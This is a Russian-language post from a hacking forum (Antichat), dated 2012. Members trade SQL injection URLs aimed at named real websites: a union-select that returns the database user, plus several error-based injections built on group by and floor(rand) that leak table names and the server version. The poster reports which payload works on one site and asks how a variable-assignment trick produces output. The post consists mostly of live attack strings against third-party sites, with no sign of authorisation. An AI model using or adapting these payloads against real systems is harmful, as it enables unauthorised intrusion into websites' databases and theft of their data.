25.03.2012, 19:12
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Cennarios
Друзья! Не забываем про внимательность и настойчивось.
ПРОФИТ:
http://www.ivrus.biz/showphoto.php?fid=6&pid=4&id=-1+union+select+1,2,3,user(),5,6,7--+
хм.. действительно
Сообщение от Ereee
Там легко же... =\
так не
http://baratro.ru/subcat.php?id=22%27+and%28select+1+from%28select+c ount%28*%29,concat%28%28select+table_name+from+inf ormation_schema.tables+limit+0,1%29,0x00,floor%28r and%280%29*2%29%29x+from+information_schema.tables +group+by+x%29a%29--+
так тоже
http://baratro.ru/subcat.php?id=22%27+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+
о, так пашет
http://baratro.ru/subcat.php?id=22'+or+(@:=1)||@+group+by+concat((se lect+version()),@:=@-1)having+@||min(@:=0)--+f
блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
|
|
|